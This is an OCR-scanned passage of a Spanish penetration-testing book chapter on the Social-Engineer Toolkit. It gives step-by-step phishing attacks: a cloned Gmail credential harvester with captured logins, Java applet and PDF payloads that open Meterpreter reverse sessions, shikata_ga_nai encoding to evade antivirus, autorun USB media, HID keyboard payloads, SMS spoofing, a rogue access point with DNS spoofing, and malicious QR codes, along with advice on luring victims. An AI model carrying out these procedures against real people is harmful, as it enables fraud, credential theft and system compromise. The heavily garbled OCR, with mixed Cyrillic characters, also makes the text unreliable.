Meterpreter Reverse HTTPS Tunnel communication over НТТР using 551 and use Meter 


Enter the payload you want (press enter for default): 2 


Fig 6.06: Elección de payload рага РОР Embedded EXE Social Engineering 


A continuación se pedirá si se quiere utilizar Sendmail y de este modo poder spoofear la dirección de 
correo electrónico con la que se quiere enviar el mail. También se indicará que el archivo malicioso 
se puede renombrar o dejar con el nombre por defecto, Antes de finalizar se indican también distintos 
aspectos importantes como son el número de destinatarios, es decir, si se enviará a uno o será un 
alaque masivo, qué plantilla se utilizará, si será una predefinida o se creará en el acto, etcétera 


Las plantillas de mail predefinidas se pueden personalizar mediante la opción “Create a Social- 
Engineering Template”. Es interesante visualizar y entender cómo funcionan estas plantillas para 
realizar un ataque, por ejemplo en el idioma del atacante о del objeivo. 


Por úliimo, se debe elegir si se enviará mediante una cuenta existente de Gmail o se utilizará un 
servidor propio para realizar el envío. En esta prueba de concepto se utilizará una cuenta de Gmail, 
creada previamente por el atacante, pero para dotar de mayor realismo al ataque debería utilizarse 
un servidor propio con la dirección de correo spoofeada. 


[+] Processing src/program_junk/meta config for ERB directivas. 

resource (src/program_ junk/meta config)> use exploit/multi/handler 

resource (src/program_junk/meta config)> set PAYLOAD windows/meterpreter/reverse 1cp 

PAYLOAD => windows/meterpreter/reverse_tcp 

resource (src/program_junk/meta config)> set LHOST 192.168.8.56 | 

LHOST => 192.168.0.56 | 

resource (src/program_junk/meta config)> set LPORT 4444 
f 


LPORT => 4444 
resource (src/program_junk/meta_config)> set ENCODING shikata ga паі 
ENCODING => shikata ga nai 

resource (src/program_ junk/meta_config)> set ExitonSession false 
ExitonSession => false 

resource (src/program_junk/meta_config)> exploit -j 

[*] Exploit running as background job. 

msf exploit(handler) > 

[*] Started reverse handler on 192.168.9.56:4444 

{*} Starting the payload handler... 


Fig 6.07: multi/hancller montado por SET 


Tras el envío del correo electrónico se pregunta al usuario si se desea configurar automáticamente 
un handler para recibir las posibles conexiones que provoque la ejecución del archivo PDF. Si 
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aigún usuario curioso ejecuta dicho archivo, y su versión, en este caso de Adobe Reader по está 
actualizada, caerá en el engaño y proporcionará un punto débil en la empresa botijos Mostoles.com. 


‹ 


4. Vector de ataque: web 


Este vector de ataque es uno de los más utilizados en SET por los usuarios. Permite montar plantillas 
de sitios web o, incluso, clonaciones en vivo de páginas web. El objetivo de este vector de ataque 
es que el usuario que visita está página web piense que está accediendo al sitio real y no a una 
falsificación. Uno de los ataques más famosos que proporciona SET en este vector de alaque es el 
del applet de ЛАУА. 


t 


Este vector de ataque presenta los siguientes ataques: 
- JAVA Applet Attack Method. Se presenta al usuario que accede al sitio web un applet 
malicioso, 
- Metasploit Browser Exploit Method. Tras recibirla petición ејесша el exploit configurado 
previamente por el atacante. Se utiliza un iframe el cual lanza el exploit sobre la máquina del 
usuario que realiza la petición sobre el servidor web malicioso. 


- Credential Harvester Attack Method. Se presenta al usuario un sitio web, clonado del 
- original. Cuando el usuario introduce sus credenciales, éstas son capturadas por el servidor 
web malicioso. 


-  Tabnabbing Attack Method. Este ataque funciona de manera similar a Credential 
Harvester Áttack Method. La única diferencia es que cuando la víctima accede al sitio web 
configurado con este método obtiene, en primer lugar, el mensaje “Please wait while the page 
loads”. Cuando el usuario cambia de pestaña, automáticamente SET lo detecta y muestra el 
sitio web malicioso. De este modo la victima cree que se le solicita las credenciales y cuando 
las introduce SET hace la recolección de esta información, provocando el engaño sobre ја 
víctima. 

- Man Left in the Middle Attack Method. Permite recolectar información mediante la 
interceplación de campos. Se necesita de una página web vulneradá, en la cual se inyecta un 
campo como <script src=htIp://direccionServer>. 


- Web Jacking Attack Method. Este método presenta una página web con un enlace 
que indica que el sitio web һа sido movido, tras pinchar en el enlace se presenta el sitio 
web malicioso clonado del real. Cuando la víctima introduce las credenciales, éstas son 
almacenadas por SET y la víctima se redirige a la página real. 


-  Multi-Attack Web Method. Este método configura un sitio web malicioso, el cual dispone 
de varios vectores de ataque cuando la víctima solicite la página web. 


А continuación se presentan las pruebas de concepto más utilizadas y que mayor éxito proporcionan 
a los usuarios realizando ingeniería social, Algunas, simplemente montan el escenario lo más real 
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posible para recolectar credenciales de la víctima, mientras que otras permiten realizar, incluso, la 
explotación del sistema de la víctima obteniendo el control de la máquina. 


PoC: Recolectando credenciales y 
Esta técnica también es denominada harvesting de credenciales y permite аі atacante montar un 


sitio web lo más parecido al real con el objetivo de recolectar las credenciales de la víctima. Antes 


de comenzar la explicación de la prueba de concepto, hay que recalcar que existe una variable en el 
fichero de configuración de SET que permite enviar enlaces por correo electrónico a la víctima, los 
cuales hacen que ésta acabe en el sitio web malicioso. Esta variable es WEBATTA CK_MAIL, y por 
detecto está configurada en on. 


Ahora se procede a realizar la prueba de concepto, el escenario es el siguiente: 


El atacante prepara en una máquina con BackTrack 5 un servidor web el cual facilitará un 
sitio web donde tas victimas deberán insertar sus credenciales. 


- Га víctima accederá con su navegador a la página web que sirve la máquina del atacante. 


¿Cómo hacer para que la víctima visite dicha máquina? Realmente dependerá de donde se encuentre 
el servidor montado. Si el atacante ha montado el servidor en una máquina en su red privada, puede 
que su objetivo real sea algún usuario de su propia red, por lo que es recomendable utilizar DNS 
Spoofing para conseguir que la víctima termine accediendo al sitio web del atacante y no al real. Por 
otro lado, si el atacante ha montado el servidor en una máquina de Internet, con su dominio real, es 
recomendable utilizar enlaces en otros sitios web, correos electrónicos masivos con enlaces al sitio 
web malicioso, o incluso utilizar redirecciones desde otros posibles sitios web hackeados. 


A continuación se procede a realizar la configuración del servidor para disponer de un sitio web 
lo más real al original. En primer lugar, tras ejecutar SET, se debe elegir la opción dos del menú 
principal denominada “Website Attack Vectors”. 


Select from the menu: 


2. Website Attack Vectors 

3. Infectious Media Generator 

4. Create a Payload and Listener 

5. Mass Mailer Attack 

6. Teensy USB HID Attack Vector 

7. SMS Spoofing Attack Vector 

8. Wireless Access Point Attack Vector 
9. Third Party Modules 

10. Update the Metasploit Framework 
11. Update the Social-Engineer Toolkit 
112. Help, Credits, and About 


4 
. Spear-Phishing Attack Vectors 
13. Exit the Social-Engineer Toolkit | 


Enter your choice: 2 


Fig 6.08: Elección del vector de ataque web 
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Tras elegir la opción, SET proporciona información sobre los distintos ataques o técnicas que е 
pueden utilizar en este vector de ataque. Se selecciona la opción “Credential Harvester лг 
Method” para rcalizar más tarde la configuración del sitio web. Después de la selección de e 
técnica se debe indicar si se utilizará una plantilla de las que dispone SET, si se realizará аң 
clonación en vivo de un sitio web o si se utilizará un sitio importado por el atacante, \ ê 


1. The Java Applet Attack Method 
2. The Metasploit Browser Exploit Method 
3. Credential Harvester Attack Method 

4. Tabnabbing Attack Method 
5 
б, 
7. 


. Man Left іп the Middle Attack Method 
Web Jacking Attack Methad 
Multi-Attack Web Method 

8. Return to the previous menu 


Enter your choice (press enter for default): 3 
Fig 6.09: Elección de Credential Harvester Attack Method 


Er} Website Attack Vectors [!] 


t 


Web Templates 
. Site Cloner 

. Custom Import 
Я Return to main menu 


Enter number (1-4): 2 

1 

і ПИЕ Тет ҮСҮЕ 
email harvester wiil allow you to utilize the clone capabilities within SET 


ito harvest crodentials or parameters from a website as well as place them into a report. 


ser supports both HTTP and HTTPS 
xample: http://www. thisisafakesite, com 
nter the url to clone: https://gmail.com 


The best way to use this attack 15 if username and password form 
fields are available, Regardless, this captures all POSTs on a website. 
[*1 І have read the above message. [*] 


- 


bress {return} to continue. 

ji] Social-Engineer Toolkit Credential Harvester Attack 
[11 Credential Harvester is running оп port 80 

Г 

L 


jiz] Information will be displayed to you as it arrives below: 


Fig 6.10: Configuración de la clonación de un silio 


Una vez que se tiene el sitio web falso preparado en la máquina se debe responder a la pregunta, 


- ¿Cómo hacer рага que las víctimas visiten el sitio web? Como se mencionaba anteriormente, ge 


pueden utilizar distintos métodos como DNS Spoofing, envío masivo de correos electrónicos, enlaces 
publicados en otros sitios web de Internet, etcétera. 
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[*] WE GOT A HIT! Printing the output: 
PARAM, рата 

ЗАДАМ: Vimplca he 

ААЛАМ: сті пиела р тутат google батта} 
ПАНАМ: беруге, 

НАДАМ: вета е 

АНАМ ела 1771418542348] 


“ARAM. 1га, 


е 
ЗАҢАР 


TS 
ARAR бй exa роо 

POSSIBLE USERNAME FIELD FOUND: Еша11=раһ1о@164 
OSSIBLE PASSWORD FIELD FOUND: Passwtd=123abc. 
ЗАЙД” ор d 


Fig 6,11: Obtención de credenciales del sitio web falso 


En la propia interacción con SET se pueden ir visualizando las conexiones que las víctimas están 
realizando al servidor. Además, SET puede detectar campos de credenciales por lo que puede ser 
realmente fácil obtener las credenciales. 


Otra opción es capturar todo el tráfico que circula por la web mediante el uso de un analizador de 
tráfico en la máquina del atacante. En este caso, se encontrarán todas las credenciales, detecte SET 
los campos donde van las credenciales o no. 


Como se puede observar en la imagen la clonación de Gmail se puede visualizar prácticamente 
idéntica a la original. Es interesante ir probando distintos sitios web, ya que no todos se clonan con 
la misma calidad. 


ат: Е е Google" 
| Username 2 a Р | ү 2 
р-на шшш од А 
| pablo@ib4 > 
>. Passwort =t 2. е A à А 


эзле» 


g Slay signed їп: ' 


Cani accoss your actaunt? >” 


Fig 6.12: Resultado de la clonación del sitio web de Gmail 


En SET se obtienen unos informes sobre el ataque realizado, con la información obtenida a través de 
éste. Estos informes o reportes son localizados en la ruta /pentest/exploits/setfreports y presentados 
en formato HTML y XML. En la página siguiente se muestra un listado con los parámetros HTTP 
que han sido capturados y que se incluirán en el informe. | 


y 
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ider.sotial engineering to be the greatest г 


Report Findings Below: 


Fig 6.13: Ejemplo de informe en SET 


PoC: JAVA applet 


Es interesante entender que la ingeniería social se basa en la confianza de la gente, en el 
desconocimiento general de las nuevas tecnologías y en el uso inapropiado de los dispositivos de 
hoy en día. Por esta razón, cualquier usuario podría ejecutar dicha prueba de concepto o ser víctima 
de ella, Es importante concienciar a los usuarios menos avanzados о соп menor interacción con 
las nuevas tecnologías para evitar estas posibles técnicas, por lo que si, generalmente, un sitio web 
como Gmail, Google, Microsoft, etcétera, nunca pidieron que se ејесиага un apple! de JAVA, ¿Por 
qué lo pedirían ahora? El uso del sentido común es la herramienta para combatir la ingeniería social, 
para conseguir que estas pruebas de concepto, e incluso explotaciones, no lleguen а buen puerto. 


En esta prueba de concepto se presenta el escenario en el que el atacante configura un servidor web, 
el cual servirá un sitio web conocido por los usuarios 'de Internet. Cuando cualquier usuario solicite ` 
el sitio web alojado en este servidor web, se mostrará la página web a la vez que un applet de JAVA. 
Si el usuario acepta el applet realmente estará ejecutando un payload en su máquina, siendo víctima 
de un ataque de ingeniería social a través de tecnologías conocidas. 


El atacante puede confgurar el applet a su gusto, por ejemplo pudiendo elegir el nombre de éste, o 
indicar que el editor del applet sean empresas como Microsoft, Google, Apple, etcétera. Este ataque 
del applet se puede incorporar a la técnica de envío masivo de correos electrónicos si se con figura la 
variable WEBATTACK_EMAIL a on en el fichero de configuración de SET. 


Un ejemplo real sería utilizar un dominio parecido al de una empresa real o un sitio reconocido por 
los usuarios de Internet. Se podrían enviar correos electrónicos de manera masiva enlazando en el 
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contenido del correo al sitio web que suplanta al original tanto en contenido como en е! dominio. 
Además, la publicación de links en foros o sitios públicos apuntando a esta imitación también podria 
ayudar, y mucho, para conseguir que los usuarios accedan al sitio web malicioso, 


La configuración del applet de JAVA en SET es realmente sencilla como se podrá estudiar a 
continuación. En el menú principal de SET se debe elegir la opción “Website Attack Vectors”, tal 
y como se realizó anteriormente en el ataque de recolección de credenciales. En el siguiente menú 
se presentan los distintos ataques de este vector, y se debe elegir el primero que es el del applei de 
JAVA. ' 


‚ The Java Applet Attack Method 
2. The Metasploit Browser Exploit Method 
3. Credential Harvester Attack Method 
14. Tabnabbing Attack Method 

5. Man Left in the Middle Attack Method 
5. Web Jacking Attack Method 

7. Multi-Attack Web Method 

8. Return to the previous menu 


[Enter your choice (press enter for default): 1 | 


Fig 6.14: Elección del ataque applet de JAVA 


Tras la ciección del método de ataque se debe seleccionar si se realizará una clonación de un sitio: 


web en el acto o si se utilizará una plantilla predefinida en SET. Para este ejemplo se clonará la 
siguiente URL. htip:/Awww.informatica64.com. 


Después de nicas la web, y si es la primera vez que se configura este ataque se pedirá información 
para crear un certificado соп el que JAVA firmará el applet, y de este modo intentar que cuando se 
provoque el aviso de la ejecución del Applet sea lo más creíble posible 


A 


[1] Website Attack Vectors [1] 


1. Web Templates ED 

2. Site Cloner 

3. Custom Import | 

4. Return to main menu | 
$ 
| 
| 
f 
| 


Enter number (1-4): 2 
SET supports both HTTP and HTTPS 


Example: http://ww.thisisafakesite.com 
Enter the url to clone: http://informatica64.com 
e ыыы ы 


Fig 6.15: Clonación de! sitio web de Informática 64 


Una vez realizada la clonación de la página web, se pedirá al usuario de SET que indique qué 
payload quiere utilizar con el applet, en esta prueba en concreto se utilizará un Meterpreter. 


Despues de la elección del payload se pide al usuario que indique un encoder para intentar evitar la 
detección de un posible software antimalware. En esta prueba de concepto se utiliza shikata ра паі, 
el cual realiza cuatro Мегасіопеѕ sobre el payload рага ofuscar su contenido. 
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Select one of the below, 'backdoored executable' is typically the best, 


avoid utf8_tolower (Normal) 
shikata_ga_noi (Very Good) 
alpha_mixed (Normal) 

alpha upper (Normal) 
call4_dword_xor (Normal) 

. countdown (Normal) 
fnstenv_mov (Normal) 

. jmp_call_additive (Normal) 
nonalpha (Normal) 

. honupper (Normal) 

. únicode mixed (Normal) 

. Unicode_upper (Normal) 

. alpha2 (Normal) 

. Но Encoding (None) 

. Muiti-Encoder (Excellent) 

. Backdoored Executable (BEST) 


* 


5 О 05 ES PEN 


со 


Fig 6.16: Elección de encoder para el payload que lanzará еГарріе! en su ejecución 


En este instante, ya se tiene configurado el servidor web con la página que lanzará el applet al 
solicitar el recurso. Cuando una víctima en potencia solicite el recurso visualizará una clonación de 
la página web de Informática 64 y a la vez visualizará un pop-up de un applet de JAVA que quiere 
ejecutarse ү 


| 1 
51 la víctima elige ejecutar el applet, el atacante recibirá una sesión de Meterpreter. SET se encarge 


де configurar el módulo exploit'multi/handler para recibir las sesiones de Meterpreter. 


E „Лотка e. 


pz. Desarrollo: 
нина dv мины ёп... 


Fig 6.17: Visualización a sitio м КА соп el арр! visible 
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{+} Exploit running as background job. 
msf exploit(handler) > 
(*] Started reverse handler on 6.0.0.8:443 


[+] Starting the payload handler... 

[+] Sending stage (752128 bytes) to 192.168.1.35 

{*] Meterpreter session 1 opened (192.168.1.40:443 -> 192.168,1,35:1393) at 2012-99-15 17:13:47 
+0200 


Fig 6.18: Sesión de Meterpreter obtenida а través del applet de JAVA 


5. Medios infectados 


Este vector de ataque es uno de los más simples y más efectivos, siempre y cuando se tenga contacto 
fisico con la víctima. La idea es generar un payload con un fichero de autorun, los cuales se deben 
instalar en un dispositivo externo como un pendrive o CD/DVD. Cuando la victima inserte este 
medio en su equipo se auto ejecutará el payload comprometiendo la seguridad del equipo. 


Este vector de ataque dispone de dos opciones en el momento de crear el ejecutable: 


- File-Format Exploits. Se genera un archivo con un formato en concreto, por ejemplo 
PDF, RAR, RTF, con el objetivo de hacer creer a la víctima que es un archivo inofensivo. 


- Standard Metasploit Executable. Equivalente a los ejecutables que se crean con 
msfpayload, comentada anteriormente en este libro, Si la variable UPX_ENCODE se 
encuentra configurada a on y la variable UPX_PATH indica la ruta donde se encuentra el 
ejecutable de UPX, se empaquetará con este packer. 

1. Windows Reverse TCP Sheli 


Spawn a command shell on victim and send back to attac] 
ker. 


2. Windows Meterpreter Reverse TCP Spawn a meterpreter shell on victim and send back to aj, 
ttacker. 
3. Windows Reverse VNC DLL 


Spawn a VNC server on victim and send back to attacker 


1. tindows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse ТСР Inline 

5. Windows Meterpreter Reverse TCP (Х64) Connect back to the attacker (Windows x64), Meterpreta 
г ‚ : 
6. Windows Shell Bind ТСР (X64) Execute payload and create an accepting port on remote 
system. 

7. Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meter 
preter 


Enter the payload you want (press enter for default): 2 
Enter the port to connect back on (press enter for default): 
[*] Defaulting to port 443... ] ' 
[+] Generating fileformat exploit.. 

[*] Payload creation complete. 

[+] AU payloads get sent to the src/program_junk/template.pdf directory. 

[+1 Your attack has been created in the SET home directory folder “autorun” 

[+] Copy the contents of the folder to a CD/DVD/USB to autorun. 


Do you want to create a listener right now yes or no: 
Fig 6.19: Generación de File-Format Exploit 
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En la imagen anterior se puede visualizar un ejemplo de cómo se genera un archivo con un formato 
concreto. Como se mencionó anteriormente, también se crea un archivo autorun con el que se 
provocará la ejecución automática al introducir el medio externo, por ejemplo el pendrive. 


El fichero autorun que se crea automáticamente se localiza en la ruta /pentest/exploits/set/autarun. 
En la imagen se puede visualizar el contenido y la localización de este archivo, 


rootábt: /pentest/exploits/set/autoruné cat autorun. inf 
[autorun] 

open=template. pdf 
icon=eutorun.icoraotaht:/pentest/exploits/set/autoruné cd .. | 
rootght:/pentest/exploits/seté 8 


Fig 6.20: Contenido del lichero autorun 


Cuando se genera un ejecutable standard de Metasploit se obtiene un archivo EXE denominado 
program.exe y el archivo autorun.inf, el cual provocará la ejecución automática del archivo EXE. La 
ruta donde se aloja es la misma que la que se comentó anteriormente: /pentest/exploits/seltlantorin. 


6. Payloads como ejecutables 


Esta opción es, realmente, similar a la anterior salvo que simplemente genera el ejecutable 
malicioso. El usuario o atacante deberá buscar la vía para hacer que la víctima ejecute el archivo 
ejecutable creado. Esta opción es equivalente a la herramienta уша, con la que se pueden 
crear ejecutables, tanto para sistemas Windows como Linux. 


Además, los payload disponibles son tanto para arquitecturas de 32 como de 54 bits. Este hecho 
hace que se abarque gran cantidad de máquinas modernas y antiguas. También es interesante la 
opción de la conexión, tanto inversa como directa, con las bind shell o reverse shell. 


Ln este libro se han realizado diversos ejemplos con la herramienta ms/payload, e incluso se han 
construido ejecutables mediante SET con la opción del apartado anterior “Medios infectados”. Para 
crear un ejecutable malicioso con SET mediante esta opción simplemente se debe elegir el payloud 
que se quiere inyectar al fichero ejecutable o binario e ir indicando las posibles opciones, como es la 
dirección ІР а la que se conectará tras la ejecución del payload. 


7. Dispositivos USB HID 


Los dispositivos HID, Human Interface Device, son utilizados para utilizar entradas al sistema que 
están reservadas para los usuarios, y además pueden devolver una salida también para estos. liste 
tipo de dispositivos se utiliza sobre la tecnología USB, ejemplos de ellos son teclados, ralones, 
etcétera. 
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El vector de ataque utilizado aquí es una combinación de hardware personalizado y derivación de 
restricción a través de emulación de teclado. Es muy común, que los dispositivos externos, como son 
los DVD o los USB, no dispongan de privilegios para realizar la ejecución automática. Es decir, nG 
se ejecuta el archivo autorun.inf, por lo que no se puede ejecutar el código de forma automatizada. 


El objetivo de este vector de ataque es que utilizando un dispositivo HID USB, se pueda emular 
un teclado o un ratón. Cuando se inserte el dispositivo, éste se detectará por el sistema сото un 
dispositivo de interfaz humana. Utilizando el microprocesador y la memoria fash incorporada en el 
dispositivo se pueden enviar pulsaciones rápidas de teclas a la máquina víctima y comprometerla, 
Hay que disponer de un dispositivo de este tipo para poder juntarlo con SET y lograr los objetivos. 


se debe seleccionar la opción número seis en el menú de SET, obteniendo así una lista de pavloads 
para generar los archivos PDE que serán cargados o importados a los dispositivos HID USR. Este 
vector utiliza scripts en PowerShell, WScripts y otros tipos de técnicas interesantes, como es la 
descarga del payload a través de métodos wget. 


Select a' payload to create the pde file to import into Arduino: 


. Powershell НТТР GET MSF Payload 

‚ WSCRIPT HTTP GET MSF Payload 

‚ Powershell based Reverse Shell Payload 

. Internet Explorer/FireFox Beef Jack Payload 

. Go to malicious java site and accept applet Payload 
. Gnome wget Download Payload 

Return te the main menu. 


[Enter your choice: | | 


Fig 6.21: Listado de payloads para la generación de archivos PDE 


мі сп л la Lu Aj ыз 


8. Ataques por correo electrónico 


Este vector de ataque pertenece a la tecnología del correo electrónico con el que se pueden realizar 
envios, ya sean dirigidos o masivos. Este vector proporciona distintos métodos para levar а cabo 
dicha acción, utilizándose principalmente para su utilización en el campo de la ingeniería social. 


En la primera opción que se ofrece se debe indicar, sencillamente, la dirección de correo electrónico 
de la víctima. Se podrá utilizar una cuenta de Gmail para realizar la acción maliciosa o la herramienta 
sendmail. Es posible emplear código HTML o directamente enviarse como texto plano. 


En la segunda opción se debe indicar el fichero que contiene las direcciones de correo electrónico 
a las que se quiere realizar el envío masivo, También se puede utilizar una cuenta de Gmail o la 
aplicación sendmai?. 


El envío masivo permite realizar acciones de SPAM, las cuales son potencialmente peligrosas, € 
incluso en algunos países ilegales. Este vector de ataque debe ser ejecutado de manera controlada 
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por el usuario o auditor, ya que con el envío masivo se puede perder el control de las acciones de- 
manera sencilla. | 


9, Falsificación de SMS 


éste vector de ataque es realmente especial, уа que permite spoofear el emisor de un mensaje sms! 
Cuando la víctima reciba el SMS aparece como emisor otro número distinto al original, con esto est 
posible realizar ataques vía SMS. | 
Se pueden utilizar distintas opciones en el menú de dicho vector además de crear о personalizar las 
plantillas para los mensajes. Este vector da la oportunidad de realizar ingeniería social a través del 
servicio móvil de los mensajes cortos. Sería posible por ejemplo mandar un link haciéndose pasar 
por un banco solicitando las credenciales del usuario, i 


Una vez que se selecciona la opción anterior se visualiza que existe un ataque dirigido a un solot 
1 
número de teléfono o la posibilidad de realizar un ataque masivo. 


This module was created by the team at TB-Security.com. 


You can use a predefined template, create your own template or specify 

an arbitrary message. The main method for this would be to get a user to 
click or coax them on a link in their browser and steal credentials or perform 
other attack vectors: 


1. Perform a SMS Spoofing до: 
2. Create a Social-Engineering Template 
3. Return to Main Menu i 


Enter your choice: 1 


SMS Attack Menu 


There are diferent attacks you can launch in the context of SMS spoofing, 
select your own. 


What do you want to do: 


1. SMS Attack Single Phone Number 
2. SMS Attack Mass “SMS 
3. Return to SMS Spoofing Menu 


Fig 6.22: Menú de sms spoofing 


Los servicios para el envío de SMS suelen ser páginas web de pago. Pero es interesante disponer de 
una cuenta de usuario y poder probar este tipo de ataque, ya que los usuarios, hoy en día, no piensan 
que estas técnicas sean utilizadas en la realidad. 
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10. Vector de ataque: Wireless 


Este vector es uno de los más interesantes ya que presenta la posibilidad de crear un punto de acceso 
falso, que simule una red. Este punto de acceso proporciona DHCP y DNS, servicios manipulados 
por el atacante para repartir las direcciones 1P е indicar cuál es la dirección ІР del servidor DNS, y 
la dirección 1P del кошек. 


3s totalmente factible pensar que se puede otorgar a la víctima la dirección 1P de la máquina del 
atacante como puerta de enlace, esto hará que todo el tráfico de la víctima circule a través de aquella. 


Otra de las posibilidades es utilizar, y asi lo hace SET, la técnica DNS Spoofing para conseguir que 
cuando la víctima solicite un recurso de un dominio, se le redirija а un servidor web que tenga el 
atacante con un sitio web similar al original. 


Hay que tener en cuenta la ruta donde se encuentran las aplicaciones dnsspoof y airbase-ng, ya que 
SET las utilizará. En la imagen se puede visualizar como mediante el uso del comando whereis se 
puede localizar la ruta de la aplicación buscada. 


rootabt:/pentest/exploits/setié whereis airbase-ng 
airbase-ng: /usr/local/sbin/airbase-ng 
rootábt:/pentest/exploits/setif whereis dnsspoof 
dnsspoof: /usr/local/sbin/dnsspoof 

rootabt: /pentest/exploits/setk 


Fig 6.23: Rutas de las aplicaciones dnsspoof y airbase-118 
Con cualquier editor de texto se debe modificar el fichero seí_config en caso de no encontrarse 


bien definidas las variables especificadas anteriormente. Como se puede visualizar en la imagen, se 
pueden encontrar las variables al final del archivo de configuración de SET. 


R THIS FEATURE WILL AUTO EMBED A IMG SRC TAG TO A UNC PATH OF YOUR ATTACK MACHINE. 
# USEFUL IF YOU WANT TO INTERCEPT THE HALF LM KEYS WITH RAINBOWTABLES. WHAT WILL HAPPEN 

# IS AS SOON AS THE VICTIM CLICKS THE MEB-PAGE LINK, A UNC PATH WILL BE INITIATED 

# AND THE METASPLOIT CAPTURE/SMB MODULE WILL INTERCEPT THE HASH VALUES. 

UNC_EMBED=0FF 

# 

# THIS FEATURE WILL ATTEMPT TO TURN CREATE A ROGUE ACCESS POINT АМО REDIRECT VICTIMS BACK TO THE 
# SET WEB SERVER WHEN ASSOCIATED. AIRBASE-NG and ONSSPOOF, 

ACCESS POINT_SSID=linksys 

AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng 

DNSSPDOF _PATH=/usr/local/sbin/dnsspootf 
# 


a 


Fig 6.24: Modificación de los valores dnsspoof y airbase 


La opción para seleccionar este vector en el menú de SET es la número ocho, denominada “Wireless 
Access Point Attack Vector”. Tras la elección de esta opción se pedirá al usuario que seleccione entre 
arrancar el punto de acceso o detenerlo, 
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Welcome to the Wireless Attack Vector, this will create an access point leveraging 
your wireless card and redirect all DNS queries to you. The concept is fairly simple, 
SET will create a wireless access point, dhcp server, and spoof DNS to redirect traffic 
to the attacker machine.. It will then exit out of that menu with everything running as 
a child process. 


You can then launch any SET attack vector you want, for example the Java Applet attack т 
when a victim joins your access point and tries going to a website, will be redirected to 
your attacker machine. - 


This attack vector uses AirBase-NG, AirMon-NG, DNSSpoof, and dhcpd3 to work properly. 
hat do you want to do: 
1, Start the SET Wireless Attack Vector Access Point 


2. Stop the SET Wireless Attack Vector Access Point 
3, Return to the SET main menu. 


ег your choice: 
на! 


эы 


Fig 6.25: Arrancando el punto de acceso con SET 


Tras ejecutar dicha opción se puede visualizar como se empieza a preparar el entorno para generar el 
punto de acceso falso. En la siguiente imagen se pueden visualizar dichas acciones. 


1. Start the SET Wireless Attack Vector Access Point 
2. Stop the SET Wireless Attack Vector Access Point 
3. Return to the SET main menu. 


Enter your choice: 1 
Enter the wireless network interface (ex. wlan0): metasploit_164 
[*] Placing card in monitor mode via airmon-Íg.. : 


Found 2 processes that could cause trouble. ў 
ІЁ airodump-ng, aireplay-ng ог airtun-ng stops working after 
a short period of time, you may want to kill (some of) them! 


784 dhclient3 
3295  dhclient3 | | 
Process with PID 3295 (dhclient3) is running on interface wlan0 


Interface Chipset Driver 
wlan = Ralink 2573 USB rt73usb - [phy0] 
mono Ralink 2573 USB rt73usb ~ [phy0]- 


[+] Spawning airbase-ng in а seperate child thread... 
[+] Sleeping 15 seconds waiting for airbase-ng to complete... 


| 
| 
| 
| 
PID Name | | | 
| 


Fig 6.26: Configuración del AP falso ` 
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11. Vector de ataque QRCode 


El vector de ataque para la generación de ORCode permite al usuario crear este tipo de imágenes que 
pueden ser leídas e interpretadas por aplicaciones móviles. El objetivo de estos códigos son las de 
enlazar, por ejemplo, sitios web. La ingeniería social mediante el uso de ORCode propone utilizarlos 
para publicar dichas imágenes en el mayor número de sitios, es decir de forma masiva, y conseguir 
que los, cada vez más, usuarios de smartphones puedan caer en la trampa. 


Generalmente, después de un OR Code malicioso se encuentra un sitio web, el cual también podría 
ser montado con SET con la opción “Website Attack Vectors”. Por ejemplo, se podría utilizar el 
ataque del applet de JAVA unido a que la víctima accediera al sitio a través de un ORCode. 


Hay que recalcar que este vector de ataque no se encuentra disponible en la mayoría de versiones 
de SET, es una de las últimas funcionalidades añadidas al toolkit, junto al vector de ataque de 
PowerShell. En este apartado se ha utilizado la distribución de BackTrack 5 R3, la cual fue liberada 
a mediados del año 2012. | | 


PoC: Ingeniería social con ип ORCode malicioso 

En la siguiente prueba de concepto se utilizará la posibilidad de generar ORCode a través de SET 
para enlazar a un usuario con un sitio web malicioso. El escenario montado es en una red local, 
donde todo dispositivo se encuentra controlado, habría que imaginar dicho escenario en Internet. El 
atacante dispondría de un servidor web y para hacer que las posibles víctimas accediesen a dicho 
recurso se utilizarían estos códigos. i 


En primer lugar, y tras arrancar SET, se debe seleccionar la opción nueve “QRCode Generator 
Attack Vector”. 


The Social-Engineer Toolkit is a product of TrustedSec. 


Visit: https://www. trustedsec, com 
Select from the menu: 


1) Spear-Phishing Attack Vecters 

2) Website Attack Vectors 

3) Infectious Media Generator 

4) Create a Payload and Listener 

5) Mass Mailer Attack 

6) Arduino-Based Attack Vector 

7) SMS Spoofing Attack Vector 

8) Wireless Access Point Attack Vector 
9) QRCode Generator Attack Vector 
10) Powershell Attack Vectors 
Third Party Modules 


Return back to the main menu. 


Fig 6.27: Elección de la opción “ORCode Generator Attack Vector” 
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Directamente se presenta la opción de introducir para qué dirección URL se generará un ORCode, 
En esta prueba de concepto se utiliza una dirección IP, pero en un escenario real, es posible que e 
atacante haya adquirido un dominio falso, parecido al sitio web геа! para confundir a las posibles yl 
potenciales víctimas. ' 


\ 


The QRCode Attack Vector will create а QRCode for you with whatever URL you want. 


When you have the ORCode Generated, select an additional attack vector within SET and 
deploy the QRCode to your victim. For example, generate а QRCode of the SET Java Applet 
and send the QRCode via a mailer, 


Enter the URL you want the QRCode to go to; http://192.168.1.38 
i*i [*] QRCode has been generated under reports/qrcode_attack. png! 
QRCode generated. 


Press <return> to continue 


Fig 6.28: Generación de un ORCode malicioso 


La imagen es almacenada en la ruta /pentest/exploits/set/reports/ en formato PNG. Esta imagen sera 
colocada en otros sitios web o mandada vía mail para conseguir que las víctimas tras la lectura del 
OR Code se conecten al servidor web malicioso. Hay que recordar que existen lectores OR Code que 
no informan del recurso al que se conectan, es decir automáticamente intentan acceder al recurso al 
que apunta el ORCode. En la imagen se puede visualizar el ORCode generado gracias al uso de SET. 


Fig 6.29: ORCode generado con SET 


12, Vector de ataque PowerShell 


Este vector de ataque que proporciona: SET permite al usuario crear pequeños scripts que serán 
ejecutados en una máquina víctima con el objetivo de obtener una sesión inversa o directa. Además, 
existe la posibilidad de realizar un volcado de SAM a través de estos scripts, pero requiere ser 
SYSTEM en el sistema. 


En la imagen se pueden visualizar las vías para generar este tipo de scripts. 
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The Powershell Attack Vector module allows you to create PowerShell specific attacks. These atta 
cks will allow 

you to use PowerShell which is available by default in all operating systems Windows Vista and a 
bove. PowerShell | 

provides а fruitful landscape for deploying payloads and performing functions that do not get 
triggered by | 
preventative technologies. 


